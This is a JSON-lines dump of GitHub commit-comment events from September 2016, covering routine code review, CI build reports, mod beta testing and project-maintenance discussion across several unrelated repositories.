{"id":"4500303846","type":"CommitCommentEvent","actor":{"login":"garfield69"},"repo":{"name":"DuckieTV/SceneNameExceptions"},"payload":{"comment":{"id":18857451,"position":null,"line":null,"path":null,"commit_id":"2709e5255204e5a1efd42499d9010ba666e20e74","created_at":"2016-09-01T03:44:36Z","updated_at":"2016-09-01T03:44:36Z","body":"Really ?\n\n \n\nWell that's a problem, I'm responding to\nhttps://www.reddit.com/r/duckietv/comments/50k6u8/tv_show_names/\n\n \n\nQuick test shows plenty of hits on TPB.  Example, The Block S12E07 returns 4\ntorrents.\n\nWhat episode were you looking for ?\n\nAre you using thepiratebay.org or some proxy?\n\n \n\n  _____  \n\nFrom: Js41637 ftw [mailto:notifications@github.com] \nSent: Thursday, 01 September 2016 15:34\nTo: DuckieTV/SceneNameExceptions\nCc: garfield69; Author\nSubject: Re: [DuckieTV/SceneNameExceptions] the gruen transfer -> gruen\n(2709e52)\n\n \n\nBlock still requires AU for me, at least for Pirate Bay, not using AU\nreturns no results.\n\n-\nYou are receiving this because you authored the thread.\nReply to this email directly, view\n<https://github.com/DuckieTV/SceneNameExceptions/commit/2709e5255204e5a1efd4\n2499d9010ba666e20e74#commitcomment-18857375>  it on GitHub, or mute\n<https://github.com/notifications/unsubscribe-auth/AGnK-FvXygkvksE0vuU3z83eZ\nTxR--leks5qlke0gaJpZM4JySG5>  the thread.\n<https://github.com/notifications/beacon/AGnK-EDgZskE6wqXSdAW6LZQ0a5cu4RTks5\nqlke0gaJpZM4JySG5.gif> \n\n\n \n\n"}},"created_at":"2016-09-01T03:44:36Z"}
{"id":"4500310645","type":"CommitCommentEvent","actor":{"login":"ardaozkal"},"repo":{"name":"jung35/VacStatus"},"payload":{"comment":{"id":18857458,"position":null,"line":null,"path":null,"commit_id":"220c3a372d33b1649d6c3129910b6c1ec4ed5c89","created_at":"2016-09-01T03:47:21Z","updated_at":"2016-09-01T03:47:21Z","body":"Jung isn't replying to mails or github comments... sigh."}},"created_at":"2016-09-01T03:47:21Z"}
{"id":"4500310744","type":"CommitCommentEvent","actor":{"login":"gberginc"},"repo":{"name":"emc-advanced-dev/unik"},"payload":{"comment":{"id":18857459,"position":69,"line":68,"path":"pkg/providers/openstack/list_instances.go","commit_id":"e703f8e34dc1906a298d30dfd6534297ce39cda8","created_at":"2016-09-01T03:47:23Z","updated_at":"2016-09-01T03:47:23Z","body":"Why do you first update instance data and only then apply the filter?"}},"created_at":"2016-09-01T03:47:23Z"}
{"id":"4500313648","type":"CommitCommentEvent","actor":{"login":"jordanh"},"repo":{"name":"ParabolInc/action"},"payload":{"comment":{"id":18857462,"position":15,"line":13,"path":"src/universal/modules/meeting/helpers/makePhaseItemFactory.js","commit_id":"1daa9e416bbc14d04b2890379a23598bce696222","created_at":"2016-09-01T03:48:36Z","updated_at":"2016-09-01T03:48:36Z","body":"Yeah, I think I got it. Just noticed one other tiny 🐞  related to advancing to first call. Going to get that one too."}},"created_at":"2016-09-01T03:48:36Z"}
{"id":"4500317131","type":"CommitCommentEvent","actor":{"login":"sgtaziz"},"repo":{"name":"jung35/VacStatus"},"payload":{"comment":{"id":18857465,"position":null,"line":null,"path":null,"commit_id":"220c3a372d33b1649d6c3129910b6c1ec4ed5c89","created_at":"2016-09-01T03:50:09Z","updated_at":"2016-09-01T03:50:09Z","body":"Jung is super busy with university right now, give him some time. In the end, even though it'd be amazing if he could give us the lists, you have to understand he's not obliged to. Idk if he's okay with it, but I can rehost VacStatus for him too if he's okay with giving me the database. It's his choice in the end :^) "}},"created_at":"2016-09-01T03:50:09Z"}
{"id":"4500321369","type":"CommitCommentEvent","actor":{"login":"ardaozkal"},"repo":{"name":"jung35/VacStatus"},"payload":{"comment":{"id":18857475,"position":null,"line":null,"path":null,"commit_id":"220c3a372d33b1649d6c3129910b6c1ec4ed5c89","created_at":"2016-09-01T03:51:51Z","updated_at":"2016-09-01T03:51:51Z","body":"@sgtaziz thanks for the clarification, happy to hear he is ok. It'd be nice if he could at least drop a small comment explaining why he shut it down and if he has plans for handing out the database..."}},"created_at":"2016-09-01T03:51:51Z"}
{"id":"4500324327","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18857480,"position":null,"line":null,"path":null,"commit_id":"3645f57ced599f6691650385c50d9f2919eb6769","created_at":"2016-09-01T03:52:58Z","updated_at":"2016-09-01T03:52:58Z","body":"@hdfukuoka1985 \r\n\r\n進捗としてはとても順調ですので、焦らずで大丈夫ですよ~。\r\nかといってゆっくりやってくださいというのも変なので、(繰り返しになるかもしれませんが)\r\n福岡さんペースでお願いします！"}},"created_at":"2016-09-01T03:52:58Z"}
{"id":"4500327297","type":"CommitCommentEvent","actor":{"login":"lulalachen"},"repo":{"name":"LeetCodeTaiwan/animix"},"payload":{"comment":{"id":18857490,"position":18,"line":14,"path":"app/components/home/home.controller.js","commit_id":"3b67d9d471469da9a1ef6e9db26bb734719b8f69","created_at":"2016-09-01T03:54:05Z","updated_at":"2016-09-01T03:54:05Z","body":"哦對 這樣比較合理 XDD"}},"created_at":"2016-09-01T03:54:05Z"}
{"id":"4500328762","type":"CommitCommentEvent","actor":{"login":"Sunako"},"repo":{"name":"Sn0wCrack/ExHentai-Archive"},"payload":{"comment":{"id":18857493,"position":null,"line":null,"path":null,"commit_id":"3211ef12957ba4b4e18f3d60024c86b8f1fd83ed","created_at":"2016-09-01T03:54:39Z","updated_at":"2016-09-01T03:54:39Z","body":"It is up to you really. Tt doesn't have to be what I said on the userscript side either, you could just make it so if you go to a gallery on the site that is deleted it could tell you it was deleted instead of showing you a broken gallery. That could be a less effort solution."}},"created_at":"2016-09-01T03:54:39Z"}
{"id":"4500331795","type":"CommitCommentEvent","actor":{"login":"YoEugene"},"repo":{"name":"LeetCodeTaiwan/animix"},"payload":{"comment":{"id":18857496,"position":18,"line":14,"path":"app/components/home/home.controller.js","commit_id":"3b67d9d471469da9a1ef6e9db26bb734719b8f69","created_at":"2016-09-01T03:55:48Z","updated_at":"2016-09-01T03:55:48Z","body":"哈哈不然一次加10太慢了\r\n另外我改了 rightPanel ，只有可以買動物時才顯示 (i) 資訊選項"}},"created_at":"2016-09-01T03:55:48Z"}
{"id":"4500332344","type":"CommitCommentEvent","actor":{"login":"gberginc"},"repo":{"name":"emc-advanced-dev/unik"},"payload":{"comment":{"id":18857497,"position":29,"line":28,"path":"pkg/providers/openstack/list_instances.go","commit_id":"e703f8e34dc1906a298d30dfd6534297ce39cda8","created_at":"2016-09-01T03:56:05Z","updated_at":"2016-09-01T03:56:05Z","body":"Just checking: the reason to separate fetch and ModifyInstances is to save the updated state only once? If you look at AWS, it will modify instances for each instance found."}},"created_at":"2016-09-01T03:56:05Z"}
{"id":"4500332796","type":"CommitCommentEvent","actor":{"login":"aabrook"},"repo":{"name":"JonathonMA/queight"},"payload":{"comment":{"id":18857499,"position":null,"line":null,"path":null,"commit_id":"60f9ab0b7037e4a784b6945cad7b36784f4c1370","created_at":"2016-09-01T03:56:17Z","updated_at":"2016-09-01T03:56:17Z","body":"L100: So we look to clean up then raise the error again to never be caught?\r\nL119/120: That is definitely brute force. Close all the things!"}},"created_at":"2016-09-01T03:56:17Z"}
{"id":"4500333126","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18857500,"position":null,"line":null,"path":null,"commit_id":"43ec3e7730f92edadb40fd1d886b36cd2db369f2","created_at":"2016-09-01T03:56:24Z","updated_at":"2016-09-01T03:56:24Z","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2016-09-01T03:56:24Z"}
{"id":"4500334358","type":"CommitCommentEvent","actor":{"login":"thannguyenhau"},"repo":{"name":"thannguyenhau/myHelloWorld"},"payload":{"comment":{"id":18857503,"position":null,"line":null,"path":null,"commit_id":"61e978dcb7510536fa698254aa46aad08f7cafbe","created_at":"2016-09-01T03:56:58Z","updated_at":"2016-09-01T03:56:58Z","body":"This is comment for commit view on history"}},"created_at":"2016-09-01T03:56:58Z"}
{"id":"4500336411","type":"CommitCommentEvent","actor":{"login":"YoEugene"},"repo":{"name":"LeetCodeTaiwan/animix"},"payload":{"comment":{"id":18857508,"position":18,"line":14,"path":"app/components/home/home.controller.js","commit_id":"3b67d9d471469da9a1ef6e9db26bb734719b8f69","created_at":"2016-09-01T03:57:48Z","updated_at":"2016-09-01T03:57:48Z","body":"不過有點奇怪的是，我deploy上docs之後，現在github pages看不到頁面了0.0"}},"created_at":"2016-09-01T03:57:48Z"}
{"id":"4500337264","type":"CommitCommentEvent","actor":{"login":"gregwhitworth"},"repo":{"name":"troy-j/ResumeWebsite"},"payload":{"comment":{"id":18857509,"position":4,"line":4,"path":"RWv3.html","commit_id":"cf76724e03d9cf198116f29c8a48bc6d03296034","created_at":"2016-09-01T03:58:09Z","updated_at":"2016-09-01T03:58:09Z","body":"this is a comment `<!--`"}},"created_at":"2016-09-01T03:58:09Z"}
{"id":"4500337373","type":"CommitCommentEvent","actor":{"login":"Js41637"},"repo":{"name":"DuckieTV/SceneNameExceptions"},"payload":{"comment":{"id":18857510,"position":null,"line":null,"path":null,"commit_id":"2709e5255204e5a1efd42499d9010ba666e20e74","created_at":"2016-09-01T03:58:11Z","updated_at":"2016-09-01T03:58:11Z","body":"Well I'm using the current WebStore version not a development version because you can't use development versions on Chrome nicely without it warning you every time you startup that you're in developer mode."}},"created_at":"2016-09-01T03:58:11Z"}
{"id":"4500338411","type":"CommitCommentEvent","actor":{"login":"sgtaziz"},"repo":{"name":"jung35/VacStatus"},"payload":{"comment":{"id":18857511,"position":null,"line":null,"path":null,"commit_id":"220c3a372d33b1649d6c3129910b6c1ec4ed5c89","created_at":"2016-09-01T03:58:36Z","updated_at":"2016-09-01T03:58:36Z","body":"He shut it down because he didn't have the time/money to keep a project like this up. A lot of performance issues and bugs existed that he had no time to fix, and no one was contributing to the project so he was stuck working on something that he, again, didn't have the time or money for. Not to mention hosting isn't free and the donations weren't enough to allow the site to support itself.\r\n\r\nI have him on steam so I could ask him on the weekend if he's ok with letting me rehost the project, but I am also currently in university and don't have a lot of free time, so might take me a week or more assuming he even agrees."}},"created_at":"2016-09-01T03:58:36Z"}
{"id":"4500339218","type":"CommitCommentEvent","actor":{"login":"jordanh"},"repo":{"name":"ParabolInc/action"},"payload":{"comment":{"id":18857514,"position":57,"line":126,"path":"src/server/graphql/models/Team/teamMutation.js","commit_id":"bdce9a9c8f920314d5b3431f71fd791ce229713e","created_at":"2016-09-01T03:58:56Z","updated_at":"2016-09-01T03:58:56Z","body":"@mattkrick this was the first change, if we're advancing only the phaseItem, we want to check that the _current_ phase (`meetingPhase`) has a phaseItem to advance."}},"created_at":"2016-09-01T03:58:56Z"}
{"id":"4500340112","type":"CommitCommentEvent","actor":{"login":"gregwhitworth"},"repo":{"name":"troy-j/ResumeWebsite"},"payload":{"comment":{"id":18857517,"position":12,"line":12,"path":"RWv3.html","commit_id":"cf76724e03d9cf198116f29c8a48bc6d03296034","created_at":"2016-09-01T03:59:20Z","updated_at":"2016-09-01T03:59:20Z","body":"Not how far back default of type here is, but you should add `type=\"text/css\"`"}},"created_at":"2016-09-01T03:59:20Z"}
{"id":"4500340411","type":"CommitCommentEvent","actor":{"login":"langsharpe"},"repo":{"name":"JonathonMA/queight"},"payload":{"comment":{"id":18857519,"position":null,"line":null,"path":null,"commit_id":"60f9ab0b7037e4a784b6945cad7b36784f4c1370","created_at":"2016-09-01T03:59:29Z","updated_at":"2016-09-01T03:59:29Z","body":"Maybe `retry` at line 100 before failing the whole task?"}},"created_at":"2016-09-01T03:59:29Z"}
{"id":"4500343062","type":"CommitCommentEvent","actor":{"login":"jordanh"},"repo":{"name":"ParabolInc/action"},"payload":{"comment":{"id":18857528,"position":88,"line":207,"path":"src/server/graphql/models/Team/teamMutation.js","commit_id":"bdce9a9c8f920314d5b3431f71fd791ce229713e","created_at":"2016-09-01T04:00:31Z","updated_at":"2016-09-01T04:00:31Z","body":"oopies. I'll should probably revert that. I was using `/graphql` to call `killMeeting`. Or, maybe I should just 💣  this line? I mean, it's presently a backdoor – right?"}},"created_at":"2016-09-01T04:00:31Z"}
{"id":"4500345065","type":"CommitCommentEvent","actor":{"login":"jordanh"},"repo":{"name":"ParabolInc/action"},"payload":{"comment":{"id":18857529,"position":5,"line":16,"path":"src/universal/modules/meeting/helpers/makePhaseItemFactory.js","commit_id":"bdce9a9c8f920314d5b3431f71fd791ce229713e","created_at":"2016-09-01T04:01:17Z","updated_at":"2016-09-01T04:01:17Z","body":"this was the second change – only include `nextPhaseItem` if the phase requires a phaseItem."}},"created_at":"2016-09-01T04:01:17Z"}
{"id":"4500345563","type":"CommitCommentEvent","actor":{"login":"aphofstede"},"repo":{"name":"yessika21289/codeigniter3-example"},"payload":{"comment":{"id":18857530,"position":15,"line":33,"path":"application/models/Authors_model.php","commit_id":"968ebe64cf6c6a881fdbf259d86bfff8e51cadf3","created_at":"2016-09-01T04:01:29Z","updated_at":"2016-09-01T04:01:29Z","body":"Better to declare types here e.g. \"@param string $name The author's name\""}},"created_at":"2016-09-01T04:01:29Z"}
{"id":"4500347145","type":"CommitCommentEvent","actor":{"login":"jordanh"},"repo":{"name":"ParabolInc/action"},"payload":{"comment":{"id":18857532,"position":null,"line":null,"path":null,"commit_id":"bdce9a9c8f920314d5b3431f71fd791ce229713e","created_at":"2016-09-01T04:02:10Z","updated_at":"2016-09-01T04:02:10Z","body":"This look good to you @mattkrick? Man, that's some intricate logic! (but the way you put it all together is fairly easy to maintain once you get your head around it)."}},"created_at":"2016-09-01T04:02:10Z"}
{"id":"4500347183","type":"CommitCommentEvent","actor":{"login":"Js41637"},"repo":{"name":"DuckieTV/SceneNameExceptions"},"payload":{"comment":{"id":18857533,"position":null,"line":null,"path":null,"commit_id":"2709e5255204e5a1efd42499d9010ba666e20e74","created_at":"2016-09-01T04:02:11Z","updated_at":"2016-09-01T04:02:11Z","body":"Actually It seems to work sometimes, maybe it's a caching issue. When I disabled network cache in dev tools it seems to work properly."}},"created_at":"2016-09-01T04:02:11Z"}
{"id":"4500347856","type":"CommitCommentEvent","actor":{"login":"Js41637"},"repo":{"name":"DuckieTV/SceneNameExceptions"},"payload":{"comment":{"id":18857534,"position":null,"line":null,"path":null,"commit_id":"2709e5255204e5a1efd42499d9010ba666e20e74","created_at":"2016-09-01T04:02:26Z","updated_at":"2016-09-01T04:02:26Z","body":"Every other time I tried I never got any results."}},"created_at":"2016-09-01T04:02:26Z"}
{"id":"4500348698","type":"CommitCommentEvent","actor":{"login":"sectioneight"},"repo":{"name":"sectioneight/dotfiles"},"payload":{"comment":{"id":18857535,"position":1,"line":1,"path":"bin/git-count-by-author","commit_id":"72a5be8a937563ce318197918d9996cd3c1d9221","created_at":"2016-09-01T04:02:46Z","updated_at":"2016-09-01T04:02:46Z","body":"Oh cod, what have I done. "}},"created_at":"2016-09-01T04:02:46Z"}
{"id":"4500349354","type":"CommitCommentEvent","actor":{"login":"lulalachen"},"repo":{"name":"LeetCodeTaiwan/animix"},"payload":{"comment":{"id":18857537,"position":18,"line":14,"path":"app/components/home/home.controller.js","commit_id":"3b67d9d471469da9a1ef6e9db26bb734719b8f69","created_at":"2016-09-01T04:03:04Z","updated_at":"2016-09-01T04:03:04Z","body":"Track by #10 "}},"created_at":"2016-09-01T04:03:04Z"}
{"id":"4500349531","type":"CommitCommentEvent","actor":{"login":"amyhaber"},"repo":{"name":"amyhaber/cnki-downloader"},"payload":{"comment":{"id":18857538,"position":null,"line":null,"path":null,"commit_id":"6aae394d26551a95247ab268f48f7efb28a6b540","created_at":"2016-09-01T04:03:09Z","updated_at":"2016-09-01T04:03:09Z","body":"@Rmcsy fixed"}},"created_at":"2016-09-01T04:03:09Z"}
{"id":"4500349985","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18857539,"position":null,"line":null,"path":null,"commit_id":"5b5301a77f83c06a293b4a4d648dc799f7bbe3e5","created_at":"2016-09-01T04:03:20Z","updated_at":"2016-09-01T04:03:20Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (1777 of 1777 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b5301a77f83c06a293b4a4d648dc799f7bbe3e5-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b5301a77f83c06a293b4a4d648dc799f7bbe3e5-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-01T04:03:20Z"}
{"id":"4500350180","type":"CommitCommentEvent","actor":{"login":"sectioneight"},"repo":{"name":"sectioneight/dotfiles"},"payload":{"comment":{"id":18857540,"position":null,"line":null,"path":null,"commit_id":"72a5be8a937563ce318197918d9996cd3c1d9221","created_at":"2016-09-01T04:03:25Z","updated_at":"2016-09-01T04:03:25Z","body":"Thanks for the pointer! Will try this out against the random awk mess I found on SO"}},"created_at":"2016-09-01T04:03:25Z"}
{"id":"4500351747","type":"CommitCommentEvent","actor":{"login":"gregwhitworth"},"repo":{"name":"troy-j/ResumeWebsite"},"payload":{"comment":{"id":18857543,"position":37,"line":37,"path":"RWv3.html","commit_id":"cf76724e03d9cf198116f29c8a48bc6d03296034","created_at":"2016-09-01T04:04:03Z","updated_at":"2016-09-01T04:04:03Z","body":"you shouldn't need these `<br>` tags, if you need space add a top margin via css"}},"created_at":"2016-09-01T04:04:03Z"}
{"id":"4500354005","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18857548,"position":null,"line":null,"path":null,"commit_id":"666b26dabc7b738808b414feb3561275a4433bf8","created_at":"2016-09-01T04:04:58Z","updated_at":"2016-09-01T04:04:58Z","body":"@Iamblichos and @JFDaly,\r\n\r\nAttached below is the beta for the 8/31 potential release. Please test respective changes below.\r\n\r\n@Iamblichos, please test your added content, make sure that the cargo ships element is not causing any undue conflicts or issues. Also look at change to 'locationimprovementfreepromotion' in unit.cpp requiring tile/unit ownership match - is that an intended change (and will that affect your mods, @JFDaly?)\r\n\r\n@JFDaly, I took care of you requests:\r\n\r\n-- fixed issue related to NegatesPromotion, please test\r\n-- added GameEvents.CityPuppeted(playerID, cityID), please test\r\n\r\n-- added City:GetNumTotalBuildings() - grabs total # of buildings (real and free) in city - expensive call, be careful!\r\n\r\nContractStarted(PlayerTypes ePlayer, ContractTypes eContract, int iTurns, int iMaintenance) doesn't return the parameters as reported. Where it says iTurns, it actually returns iMaintenance, and iMaintenance is null. Not a major issue, but would be nice to have fixed.\r\n-- Me: Are you sure? GAMEEVENTINVOKE_HOOK(GAMEEVENT_ContractStarted, m_pPlayer->GetID(), eContract, iTurns, iMaintenance) seems to work.\r\n\r\nPlayer:EndContract doesn't seem to work at all. At least, Player:PlayerHasContract will still return true even after EndContract has been invoked.\r\n-- fixed, please test\r\n\r\nContract turns don't persist upon load. Re-loading the game and all Contract turns are reset to -1. However, PlayerHasContract still registered as true \r\n-- fixed, please test\r\n\r\nPlayer:ChangeContractTurns(contractID, value) function? \r\n-- added, please test\r\n\r\nCheers,\r\nGazebo\r\n\r\n\r\nLink: https://mega.nz/#!aQ1RDB7R!B80hw1An2agiKm00vv16oSJI7Y-WiXN3cyJhwmN4vDs"}},"created_at":"2016-09-01T04:04:58Z"}
{"id":"4500354288","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18857549,"position":null,"line":null,"path":null,"commit_id":"e38ea8882941ebf45a48a84e82af37117e68ce1b","created_at":"2016-09-01T04:05:05Z","updated_at":"2016-09-01T04:05:05Z","body":"FixCentroidForNonconvex (JasonGlazer) - Win64-Windows-7-VisualStudio-12: OK (2332 of 2333 tests passed, 0 test warnings)\n\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e38ea8882941ebf45a48a84e82af37117e68ce1b-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e38ea8882941ebf45a48a84e82af37117e68ce1b-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-01T04:05:05Z"}
{"id":"4500356787","type":"CommitCommentEvent","actor":{"login":"sidinorris"},"repo":{"name":"sidinorris/Seguranca"},"payload":{"comment":{"id":18857553,"position":null,"line":null,"path":null,"commit_id":"81aafeb101568347486d30b5d91b51ce9c9051e8","created_at":"2016-09-01T04:06:07Z","updated_at":"2016-09-01T04:06:07Z","body":"Ok."}},"created_at":"2016-09-01T04:06:07Z"}
{"id":"4500359110","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18857613,"position":null,"line":null,"path":null,"commit_id":"5b5301a77f83c06a293b4a4d648dc799f7bbe3e5","created_at":"2016-09-01T04:06:58Z","updated_at":"2016-09-01T04:06:58Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b5301a77f83c06a293b4a4d648dc799f7bbe3e5-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-01T04:06:58Z"}
{"id":"4500360981","type":"CommitCommentEvent","actor":{"login":"sjmittal"},"repo":{"name":"sjmittal/pinpoint"},"payload":{"comment":{"id":18857687,"position":null,"line":null,"path":null,"commit_id":"738fe012105f59a40e21f660597992dcaf0781e4","created_at":"2016-09-01T04:07:40Z","updated_at":"2016-09-01T04:07:40Z","body":"No. This feature has already been implemented in pinpoint 1.6 version.\r\nPlease follow that version for this feature."}},"created_at":"2016-09-01T04:07:40Z"}
{"id":"4500361734","type":"CommitCommentEvent","actor":{"login":"ivandrofly"},"repo":{"name":"SubtitleEdit/subtitleedit"},"payload":{"comment":{"id":18857717,"position":null,"line":null,"path":null,"commit_id":"f6e917367921d0f459c7b021996d77979e83a8b6","created_at":"2016-09-01T04:07:57Z","updated_at":"2016-09-01T04:07:57Z","body":"> Also, \"show only differences\" combined with \"Only show differences in text\" does not work anymore when lines are deleted\r\n\r\nHave you tested it with https://github.com/SubtitleEdit/subtitleedit/pull/1937?"}},"created_at":"2016-09-01T04:07:57Z"}
{"id":"4500365316","type":"CommitCommentEvent","actor":{"login":"sjmittal"},"repo":{"name":"sjmittal/pinpoint"},"payload":{"comment":{"id":18857818,"position":null,"line":null,"path":null,"commit_id":"9694000cff02772f5207f9b89542e7a0ec0a7482","created_at":"2016-09-01T04:09:25Z","updated_at":"2016-09-01T04:09:25Z","body":"Since this was branched out of an older version of pinpoint, there may be many merge issues. I would need to merge the latest pinpoint master with this branch resolve conflicts and then issue a PR.\r\nI will try to do this later this month."}},"created_at":"2016-09-01T04:09:25Z"}
{"id":"4500367170","type":"CommitCommentEvent","actor":{"login":"byteandahalf"},"repo":{"name":"byteandahalf/gameboi"},"payload":{"comment":{"id":18857821,"position":null,"line":null,"path":null,"commit_id":"2bfac780c86667de09ba885058728ec052096eb5","created_at":"2016-09-01T04:10:15Z","updated_at":"2016-09-01T04:10:15Z","body":"bootrom size typo*. Oh, the irony."}},"created_at":"2016-09-01T04:10:15Z"}
{"id":"4500367915","type":"CommitCommentEvent","actor":{"login":"OpenERPJeff"},"repo":{"name":"osbzr/gooderp_addons"},"payload":{"comment":{"id":18857823,"position":null,"line":null,"path":null,"commit_id":"4fde97eaacb2c9fde6569970f979ea4619c4584c","created_at":"2016-09-01T04:10:34Z","updated_at":"2016-09-01T04:10:34Z","body":"ProgrammingError: column \"wml.cost\" must appear in the GROUP BY clause or be used in an aggregate function\r\nLINE 25: ...         ELSE - wml.goods_qty END) * (wml.price - wml.cost) ..."}},"created_at":"2016-09-01T04:10:34Z"}
{"id":"4500372941","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18857842,"position":null,"line":null,"path":null,"commit_id":"666b26dabc7b738808b414feb3561275a4433bf8","created_at":"2016-09-01T04:12:37Z","updated_at":"2016-09-01T04:12:37Z","body":"Yes, I changed the 'locationimprovementfreepromotion'  because it makes no sense to receive a promotion from your enemies improvements. Does this have any intention of applying that in neutral territory?"}},"created_at":"2016-09-01T04:12:37Z"}
{"id":"4500377634","type":"CommitCommentEvent","actor":{"login":"nums11"},"repo":{"name":"nums11/collegeorganizer"},"payload":{"comment":{"id":18857850,"position":16,"line":16,"path":"app/views/schools/division_index.html.erb","commit_id":"4efadfc0c451d4cb5f516455b7362c6486112c50","created_at":"2016-09-01T04:14:34Z","updated_at":"2016-09-01T04:14:34Z","body":"GItHub is amazing"}},"created_at":"2016-09-01T04:14:34Z"}
{"id":"4500378047","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18857851,"position":null,"line":null,"path":null,"commit_id":"5b5301a77f83c06a293b4a4d648dc799f7bbe3e5","created_at":"2016-09-01T04:14:44Z","updated_at":"2016-09-01T04:14:44Z","body":"develop (mjwitte) - i386-Windows-7-VisualStudio-12: OK (1760 of 1760 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b5301a77f83c06a293b4a4d648dc799f7bbe3e5-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b5301a77f83c06a293b4a4d648dc799f7bbe3e5-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-01T04:14:44Z"}
{"id":"4500379454","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18857884,"position":null,"line":null,"path":null,"commit_id":"666b26dabc7b738808b414feb3561275a4433bf8","created_at":"2016-09-01T04:15:16Z","updated_at":"2016-09-01T04:15:16Z","body":"Heading to bed, will test first thing in the A.M. and give you the thumbs up or ...the fix. And fix whatever Mr. Daly needs in regards to improvements."}},"created_at":"2016-09-01T04:15:16Z"}
{"id":"4500381707","type":"CommitCommentEvent","actor":{"login":"Andsbf"},"repo":{"name":"chenggiant/calendar-in-notification-center"},"payload":{"comment":{"id":18857885,"position":null,"line":null,"path":null,"commit_id":"1d59c8f7b1b3a3f6d5c952d72f0436c201a4ba7d","created_at":"2016-09-01T04:16:15Z","updated_at":"2016-09-01T04:16:15Z","body":"Link ins broken! :("}},"created_at":"2016-09-01T04:16:15Z"}
{"id":"4500394207","type":"CommitCommentEvent","actor":{"login":"niksedk"},"repo":{"name":"SubtitleEdit/subtitleedit"},"payload":{"comment":{"id":18857905,"position":null,"line":null,"path":null,"commit_id":"f6e917367921d0f459c7b021996d77979e83a8b6","created_at":"2016-09-01T04:21:24Z","updated_at":"2016-09-01T04:21:24Z","body":"yes"}},"created_at":"2016-09-01T04:21:24Z"}
{"id":"4500399958","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18857920,"position":null,"line":null,"path":null,"commit_id":"5b5301a77f83c06a293b4a4d648dc799f7bbe3e5","created_at":"2016-09-01T04:23:52Z","updated_at":"2016-09-01T04:23:52Z","body":"develop (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (1760 of 1760 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b5301a77f83c06a293b4a4d648dc799f7bbe3e5-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b5301a77f83c06a293b4a4d648dc799f7bbe3e5-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-01T04:23:52Z"}
{"id":"4500400330","type":"CommitCommentEvent","actor":{"login":"gberginc"},"repo":{"name":"emc-advanced-dev/unik"},"payload":{"comment":{"id":18857921,"position":44,"line":43,"path":"pkg/providers/openstack/run_instance.go","commit_id":"e703f8e34dc1906a298d30dfd6534297ce39cda8","created_at":"2016-09-01T04:24:03Z","updated_at":"2016-09-01T04:24:03Z","body":"Is int64 needed to support current resource capabilities? To me it seems that you have to do a lot of explicit casting here and in pickFlavor just because int64 is used."}},"created_at":"2016-09-01T04:24:03Z"}
